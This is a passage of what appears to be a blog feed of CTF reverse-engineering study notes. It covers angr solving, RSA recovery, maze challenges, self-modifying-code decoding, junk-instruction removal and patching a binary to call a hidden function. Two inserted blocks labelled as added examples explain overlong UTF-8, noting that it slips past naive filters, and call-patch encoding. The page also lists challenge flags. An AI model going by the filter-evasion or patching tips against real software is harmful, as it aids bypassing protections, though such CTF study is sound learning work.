class="string">'''</span></span><br></pre></td></tr></table></figure><p>Huh???? Why is there no answer??? I asked the almighty <code>Rx</code>, and his explanation was roughly this: the last encryption function is <code>SHA256</code>, and as everyone knows <code>SHA256</code> is a one-way algorithm, so z3 cannot produce a result for it. But by the time execution reaches <code>SHA256</code>, its input has effectively already been determined, so we set <code>find</code> to the point where it enters <code>SHA256</code>, namely <code>0x40152d</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./RedVelvet"</span>,load_options={<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>})</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find=<span class="number">0x40152d</span>,avoid=[<span class="number">0x4007D0</span>])</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment">#flag{What_You_Wanna_Be?:)_l`_la}</span></span><br></pre></td></tr></table></figure><p>A side note: on <code>wsl</code> it only seemed to take about <code>4mins</code>...</p>]]></content>
<categories>
<category> CTF study notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Learning RE under RX's guidance: week 4</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/</url>
<content type="html"><![CDATA[<h3 id="DMCTF2020-re3"><a href="#DMCTF2020-re3" class="headerlink" title="DMCTF2020 re3"></a>DMCTF2020 re3</h3><p>Following the hint, using PEiD and IDA's Findcrypt plugin, we find a big number: <code>21232f297a57a5a743894a0e4a801fc3</code>. Such a long string is either <code>RSA</code> or a hash function, but this program is clearly not RSA, so just try the hashes one by one on cmd5: it is an md5 digest, and it resolves to admin.</p><h3 id="ACTF2020-Oruga"><a href="#ACTF2020-Oruga" class="headerlink" title="ACTF2020 Oruga"></a>ACTF2020 Oruga</h3><p>Obviously a maze challenge; the main function first checks the <code>flag</code> format, then processes it.</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span 
class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">_BOOL8 __fastcall <span class="title">sub_78A</span><span class="params">(<span class="keyword">char</span> *a1)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-Ch]</span></span><br><span class="line"> <span class="keyword">int</span> v3; <span class="comment">// [rsp+10h] [rbp-8h]</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// [rsp+14h] [rbp-4h]</span></span><br><span class="line"></span><br><span class="line"> v2 = <span class="number">0</span>;</span><br><span class="line"> v3 = <span class="number">5</span>;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="built_in">map</span>[v2] != <span class="string">'!'</span> )</span><br><span class="line"> {</span><br><span class="line"> v2 -= v4;</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'W'</span> || v4 == <span class="number">-16</span> ) <span class="comment">// up</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'E'</span> || v4 == <span class="number">1</span> ) <span class="comment">// right</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != <span class="string">'M'</span> || v4 == <span class="number">16</span> ) <span class="comment">// down</span></span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a1[v3] != 
<span class="string">'J'</span> || v4 == <span class="number">-1</span> ) <span class="comment">// left</span></span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> v4 = <span class="number">-1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">16</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> v4 = <span class="number">-16</span>;</span><br><span class="line"> }</span><br><span class="line"> ++v3;</span><br><span class="line"> <span class="keyword">while</span> ( !<span class="built_in">map</span>[v2] )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">-1</span> && (v2 & <span class="number">0xF</span>) == <span class="number">0</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">1</span> && v2 % <span class="number">16</span> == <span class="number">15</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">16</span> && (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(v2 - <span class="number">240</span>) <= <span class="number">0xF</span> )</span><br><span class="line"> <span 
class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> <span class="keyword">if</span> ( v4 == <span class="number">-16</span> && (<span class="keyword">unsigned</span> <span class="keyword">int</span>)(v2 + <span class="number">15</span>) <= <span class="number">0x1E</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line"> v2 += v4;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> a1[v3] == <span class="string">'}'</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>The rules are:</p><ul><li>the starting point is the first character</li><li>each direction corresponds to a letter</li><li>keep going in one direction; on hitting an obstacle, change direction; on hitting the boundary, exit immediately</li></ul><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210122103044369.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210122103044369.png" srcset=""></p><blockquote><p>flag{MEWEMEWJMEWJM}</p></blockquote><h3 id="网鼎杯2020-signal"><a href="#网鼎杯2020-signal" class="headerlink" title="网鼎杯2020 signal"></a>网鼎杯2020 signal</h3><p>Ah~ what has to be learned has to be learned sooner or later... back when I played moe they already told us to learn this thing, but I was really lazy and didn't want to... now I have to. Knowing just a tiny bit of <code>angr</code> makes this challenge very simple, so I'll just paste the code:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line">p = angr.Project(<span class="string">"./signal.exe"</span>,auto_load_libs=<span class="literal">False</span>)</span><br><span class="line">sta = p.factory.entry_state()</span><br><span class="line">sim = p.factory.simulation_manager(sta)</span><br><span class="line">sim.explore(find = <span 
class="number">0x40175E</span>)</span><br><span class="line">print(sim.found[<span class="number">0</span>].posix.dumps(<span class="number">0</span>))</span><br><span class="line"><span class="comment"># 757515121f3d478</span></span><br></pre></td></tr></table></figure><p>It can also be done with <code>Ponce</code>, but I tried several times here and, for whatever reason, could only recover the first 13 characters...</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210123022450468.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week4/image-20210123022450468.png" srcset="" alt="image-20210123022450468"></p>]]></content>
<categories>
<category> CTF study notes </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Learning RE under RX's guidance: week 3</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/</url>
<content type="html"><![CDATA[<h3 id="SUCTF2019-Signin"><a href="#SUCTF2019-Signin" class="headerlink" title="SUCTF2019 Signin"></a>SUCTF2019 Signin</h3><p>Check with <code>DIE</code>: <code>ELF64</code>. Open it in <code>IDA</code>; the symbol table hasn't been stripped, sweet.</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112210814599.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112210814599.png" srcset="" alt="image-20210112210814599"></p><p><code>gmpz</code>... looks familiar... right! <code>python</code> has a library called <code>gmpy</code>; my blind guess is that this is an arbitrary-precision library. From <code>__gmpz_powm</code> it is not hard to guess that this is <code>RSA</code>:</p><blockquote><p>N = 103461035900816914121390101299049044413950405173712170434161686539878160984549 </p><p>c = 0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35 </p><p>e = 65537</p></blockquote><p>Factor <code>N</code>:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112231431881.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112231431881.png" srcset="" alt="image-20210112231431881"></p><p><code>python</code> script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"></span><br><span class="line">p = <span class="number">366669102002966856876605669837014229419</span></span><br><span class="line">q = <span class="number">282164587459512124844245113950593348271</span></span><br><span 
class="line">N = <span class="number">103461035900816914121390101299049044413950405173712170434161686539878160984549</span></span><br><span class="line">c = <span class="number">0xad939ff59f6e70bcbfad406f2494993757eee98b91bc244184a377520d06fc35</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line"></span><br><span class="line">d = gmpy2.invert(e,(p-<span class="number">1</span>)*(q-<span class="number">1</span>))</span><br><span class="line">m = gmpy2.powmod(c,d,p*q)</span><br><span class="line"></span><br><span class="line">print(<span class="built_in">hex</span>(m))</span><br><span class="line"><span class="comment"># 0x73756374667b50776e5f405f68756e647265645f79656172737d</span></span><br></pre></td></tr></table></figure><p>Then convert the hex to characters:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112232356996.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210112232356996.png" srcset="" alt="image-20210112232356996"></p><h3 id="FlareOn6-Overlang"><a href="#FlareOn6-Overlang" class="headerlink" title="FlareOn6 Overlang"></a>FlareOn6 Overlang</h3><p>Open the folder; there is a hint:</p><blockquote><p>The secret of this next challenge is cleverly hidden. 
However, with the right approach, finding the solution will not take an <b>overlong</b> amount of time.</p><p>Hint: wrap the string you recover in flag{}, in the form flag{[email protected]}.</p></blockquote><p>Roughly: this challenge is weird, and you need the right approach...</p><p>Let's start with the usual approach: open it in <code>IDA</code>. <code>woc</code>, there's so little:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204027449.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204027449.png" srcset="" alt="image-20210113204027449"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204208555.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204208555.png" srcset="" alt="image-20210113204208555"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204225858.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204225858.png" srcset="" alt="image-20210113204225858"></p><p>Read through it all... <code>emmmmm</code>... no ideas...</p><p>There is something that looks like an encryption algorithm, but it feels like a pile of bit operations isn't something you're meant to reverse...</p><p>Let's look for anything odd...</p><p>When <code>sub_401160</code> is called, the third argument is <code>0x1C</code>, but reading <code>sub_401160</code>, the third argument should be the length of the second argument, and the second argument's length is <code>0xAF</code>. Combine that with the message box shown when it runs:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204849438.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113204849438.png" srcset="" alt="image-20210113204849438"></p><p>We debug it and change that value:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205304364.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205304364.png" srcset="" alt="image-20210113205304364"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205328521.png" 
class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205328521.png" srcset="" alt="image-20210113205328521"></p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">flag{[email protected]}</span><br></pre></td></tr></table></figure><h3 id="BJDCTF2020-easy"><a href="#BJDCTF2020-easy" class="headerlink" title="BJDCTF2020 easy"></a>BJDCTF2020 easy</h3><p>提示:和上一个题有异曲同工之妙……哦~</p><p>运行提示:<code>Can you find me?</code></p><p>为什么有一种莫名的做<code>pwn</code>的感觉……</p><p>既然让我们找,那我们就找找,<code>shift F12</code>,字符串没什么……</p><p>在函数表里面找找……<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205810179.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113205810179.png" srcset="" alt="image-20210113205810179"></p><p><code>C</code>语言里面应该没有叫做<code>ques</code>的函数吧<code>(ques,,,question???)</code>,看了看没有函数调用它……好家伙,这不就是<code>pwn</code>里面的<code>backdoor</code>函数么……</p><p>直接动调,随便修改一个指令为</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">call 0x401520</span><br></pre></td></tr></table></figure><p>这里建议修改<code>main</code>函数里面的内容,如果修改别的库函数,可能会有各种奇奇怪怪的问题……</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113215720899.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week3/image-20210113215720899.png" srcset="" alt="image-20210113215720899"></p>]]></content>
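<![CDATA[<p>The Overlong challenge name and its hint point at overlong UTF-8 encodings: a code point such as <code>A</code> (0x41) can be written in two, three or four bytes by padding with zero bits, and a strict decoder rejects that form while a lenient one accepts it. The writeup above only shows the length argument being fixed in the debugger, so the following is an added Python example, not code from the challenge binary: it encodes a constructed message as overlong sequences, shows that Python's strict decoder refuses it, decodes it leniently, and shows how a too-small byte cap (like the <code>0x1C</code> passed to <code>sub_401160</code> instead of <code>0xAF</code>) silently truncates the recovered text. The message, the width pattern and the cap values are constructed for the example.</p>

```python
"""Overlong UTF-8 and why a short length argument hides the message.

Added example for the Overlong challenge; it does not reproduce the binary's decoder.
The message, the byte-width pattern and the caps below are constructed for the example.
"""

# (lead byte marker, number of payload bits in the lead byte) for 2-, 3- and 4-byte forms
_LEAD = {2: (0xC0, 5), 3: (0xE0, 4), 4: (0xF0, 3)}


def encode_overlong(cp, nbytes):
    """Encode code point `cp` in exactly `nbytes` UTF-8 bytes.

    Valid UTF-8 demands the shortest form; asking for more bytes than needed
    produces an *overlong* sequence (e.g. 'A' as C1 81 or E0 81 81).
    """
    if nbytes == 1:
        if cp > 0x7F:
            raise ValueError("one byte only covers ASCII")
        return bytes([cp])
    marker, lead_bits = _LEAD[nbytes]
    cont = []
    for _ in range(nbytes - 1):          # continuation bytes carry 6 bits each: 10xxxxxx
        cont.append(0x80 | (cp & 0x3F))
        cp >>= 6
    if cp >= (1 << lead_bits):
        raise ValueError("code point does not fit in %d bytes" % nbytes)
    return bytes([marker | cp] + cont[::-1])


def strict_rejects(buf):
    """True if Python's strict UTF-8 decoder refuses the buffer (it rejects overlong forms)."""
    try:
        buf.decode("utf-8")
        return False
    except UnicodeDecodeError:
        return True


def decode_lenient(buf, max_bytes=None):
    """Decode UTF-8 while accepting overlong forms, reading at most `max_bytes` input bytes.

    A sequence cut off by the cap is dropped, which is how a too-small length
    argument truncates the output instead of raising an error.
    """
    if max_bytes is not None:
        buf = buf[:max_bytes]
    out, i = [], 0
    while i < len(buf):
        b = buf[i]
        if b < 0x80:
            n, cp = 1, b
        elif b & 0xE0 == 0xC0:
            n, cp = 2, b & 0x1F
        elif b & 0xF0 == 0xE0:
            n, cp = 3, b & 0x0F
        elif b & 0xF8 == 0xF0:
            n, cp = 4, b & 0x07
        else:
            raise ValueError("unexpected byte 0x%02x at offset %d" % (b, i))
        if i + n > len(buf):
            break                         # sequence truncated by the cap: stop here
        for k in range(1, n):
            c = buf[i + k]
            if c & 0xC0 != 0x80:
                raise ValueError("bad continuation byte at offset %d" % (i + k))
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)


SAMPLE_MESSAGE = "flag{overlong}"         # constructed, not the challenge's string


def build_sample(message=SAMPLE_MESSAGE, pattern=(2, 3, 4)):
    """Encode each character of `message` with a cycling overlong width (2, 3, 4, 2, ...)."""
    return b"".join(encode_overlong(ord(ch), pattern[i % len(pattern)])
                    for i, ch in enumerate(message))


if __name__ == "__main__":
    buf = build_sample()
    print(len(buf), "bytes; strict decoder rejects:", strict_rejects(buf))
    print("capped at 13 bytes:", decode_lenient(buf, 13))
    print("full length       :", decode_lenient(buf))
```

<p>With the constructed 41-byte buffer, a cap of 13 bytes yields only <code>flag</code>, while the full length yields <code>flag{overlong}</code>; the same mechanism is why the binary's message box stops early with <code>0x1C</code> and completes with <code>0xAF</code>. Overlong forms matter outside CTFs too: a filter that checks for <code>/</code> or <code>&lt;</code> before a lenient decoder runs will miss their overlong spellings.</p>]]>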
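<![CDATA[<p>The BJDCTF2020 easy patch described above (pointing an instruction in <code>main</code> at the never-called <code>ques</code> function at <code>0x401520</code>) is a five-byte <code>E8</code> call whose operand is a displacement relative to the end of the call instruction. The following added Python example, not code from the challenge or from IDA, computes that encoding for a hypothetical patch address inside <code>main</code>, decodes it back to check, and shows that the displacement changes (and goes negative) when the patch address moves. Only <code>0x401520</code> comes from the page; <code>PATCH_VA</code>, <code>CODE_VA</code> and the code buffer are assumptions made up for the demonstration.</p>

```python
"""Encoding a 5-byte `call rel32` patch that redirects execution to an uncalled function.

Added example; the only value taken from the page is the backdoor address 0x401520.
PATCH_VA, CODE_VA and the code buffer are assumptions made up for the demonstration.
"""
import struct

CALL_REL32 = 0xE8
JMP_REL32 = 0xE9

BACKDOOR_VA = 0x401520      # `ques`, from the page
PATCH_VA = 0x4014D0         # assumed: an instruction boundary inside main, >= 5 bytes long
CODE_VA = 0x4014C0          # assumed: where the toy code buffer below is mapped


def encode_rel32(patch_va, target_va, opcode=CALL_REL32):
    """Bytes of `call/jmp target_va` placed at patch_va.

    x86 encodes the target relative to the address of the *next* instruction,
    i.e. patch_va + 5, as a signed 32-bit little-endian displacement.
    """
    rel = target_va - (patch_va + 5)
    if not -0x80000000 <= rel <= 0x7FFFFFFF:
        raise ValueError("target out of rel32 range")
    return bytes([opcode]) + struct.pack("<i", rel)


def decode_rel32(patch_va, insn):
    """Inverse of encode_rel32: recover the absolute target of a 5-byte call/jmp."""
    if len(insn) != 5 or insn[0] not in (CALL_REL32, JMP_REL32):
        raise ValueError("not a 5-byte rel32 call/jmp")
    return patch_va + 5 + struct.unpack("<i", insn[1:])[0]


def patch_call(code, code_va, patch_va, target_va):
    """Overwrite five bytes of `code` (mapped at code_va) with a call to target_va.

    The caller must pick patch_va on an instruction boundary covering at least
    five bytes, otherwise the tail of the next instruction is corrupted.
    """
    off = patch_va - code_va
    if off < 0 or off + 5 > len(code):
        raise ValueError("patch falls outside the buffer")
    out = bytearray(code)
    out[off:off + 5] = encode_rel32(patch_va, target_va)
    return bytes(out)


# constructed code buffer: 32 NOPs standing in for main's body
TOY_CODE = b"\x90" * 32


def demo():
    """Apply the patch to the toy buffer and decode it back."""
    patched = patch_call(TOY_CODE, CODE_VA, PATCH_VA, BACKDOOR_VA)
    start = PATCH_VA - CODE_VA
    insn = patched[start:start + 5]
    return insn, decode_rel32(PATCH_VA, insn)


if __name__ == "__main__":
    insn, target = demo()
    print(insn.hex(), "->", hex(target))
```

<p>For the assumed patch address the bytes are <code>E8 4B 00 00 00</code>; a patch placed after <code>ques</code> (say at <code>0x401600</code>) gets a negative displacement, <code>E8 1B FF FF FF</code>. When patching in a debugger, the return from <code>ques</code> lands on the instruction after the patch, so what follows must still be valid code.</p>]]>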
<categories>
<category> CTF学习笔记 </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>Re学习之RX引路_week2</title>
<link href="2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/"/>
<url>2021/02/23/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/</url>
<content type="html"><![CDATA[<h3 id="从-CNSS-偷来的-SMC"><a href="#从-CNSS-偷来的-SMC" class="headerlink" title="SMC (borrowed from CNSS)"></a>SMC (borrowed from CNSS)</h3><p>I first met the term <code>SMC (Self-Modifying Code)</code> while reading 《加密与解密》 (the book Encryption and Decryption). The first <code>SMC</code> challenge I remember was a <code>maze</code> challenge in the online round of the 2nd National High School Cyber Security Competition, where the self-modified content was the map. That one was easy, which made me think <code>smc</code> was easy, and then this year's <code>SWUPCTF</code> slapped me hard: I could not do its first <code>smc</code> challenge at all.</p><p>The <code>smc</code> in this challenge is fairly simple (not really), but I failed at first because the <code>swup</code> challenge was still in my head: I went looking globally for the <code>vm</code> function that changes page permissions, did not find it in the function list, searched by hand before <code>main</code>, did not find it there either, and got stuck... until a couple of days ago I met the great <code>rx</code>, we talked about this challenge, and he said: noob <code>bb</code>, do you know what <code>NX</code> (non-executable stack) protection is???? Holding back tears of shame, I finally understood. In this binary the text section is writable, so no <code>vm</code> function is needed to change permissions. So I searched inside <code>main</code> and finally found the <code>smc</code> function:<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205530210.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205530210.png" srcset="" alt="image-20201224205530210"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205337596.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224205337596.png" srcset="" alt="image-20201224205337596"></p><p>The three arguments can be read off in <code>main</code>; write an <code>ida_python</code> script (cribbed from <code>RX</code>):</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> ida_bytes <span class="keyword">import</span> *</span><br><span class="line"><span class="comment"># XOR-decode the 0x138 bytes at 0x408b06 with key 74, the start, length and key main passes to the SMC routine</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0x138</span>):</span><br><span class="line">    patch_byte(<span class="number">0x408b06</span>+i, get_byte(<span class="number">0x408b06</span>+i)^<span class="number">74</span>)</span><br></pre></td></tr></table></figure><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224211443049.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224211443049.png" srcset="" alt="image-20201224211443049"></p><p>OK, now it is clear: a <code>maze</code> challenge. Extract the maze and walk it by hand:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212041719.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212041719.png" srcset="" alt="image-20201224212041719"></p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212054162.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201224212054162.png" srcset="" alt="image-20201224212054162"></p><h3 id="ByteCTF-2020-AWD-TikTokAdmin-简单花指令"><a href="#ByteCTF-2020-AWD-TikTokAdmin-简单花指令" class="headerlink" title="ByteCTF 2020 AWD TikTokAdmin simple junk instructions"></a>ByteCTF 2020 AWD TikTokAdmin simple junk instructions</h3><p>This challenge only asks for the junk instructions to be removed, so look for them directly in IDA's Problems window:</p><p><img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085406121.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085406121.png" srcset="" alt="image-20201226085406121"></p><p>Both spots are junk of the very simple kind:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">je loc_8125+1</span><br><span class="line">jnz loc_8125+1</span><br><span class="line"></span><br><span class="line">je loc_81f2+1</span><br><span class="line">jnz loc_81f2+1</span><br></pre></td></tr></table></figure><p>A <code>je</code> and a <code>jnz</code> to the same address together form an unconditional jump, so the byte at the fall-through address (<code>loc_8125</code> and <code>loc_81f2</code> themselves) never executes and only exists to throw the disassembler off. <code>Patch</code> that byte to a NOP (or rewrite the pair as a <code>jmp</code>), then press <code>P</code> to recreate the function.</p><h3 id="attachment"><a href="#attachment" class="headerlink" title="attachment"></a>attachment</h3><p>The third challenge from last week, the <code>C++</code> reversing one (it is a Unity game, so the logic lives in C# DLLs): the idea is simple, but with that many <code>dll</code>s, which one do you decompile??? And how do you know it is inside<img src="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085221239.png" class="lazyload" data-srcset="/images/Re%E5%AD%A6%E4%B9%A0%E4%B9%8BRX%E5%BC%95%E8%B7%AF-week2/image-20201226085221239.png" srcset="" alt="image-20201226085221239"><br>this event...</p><p><img 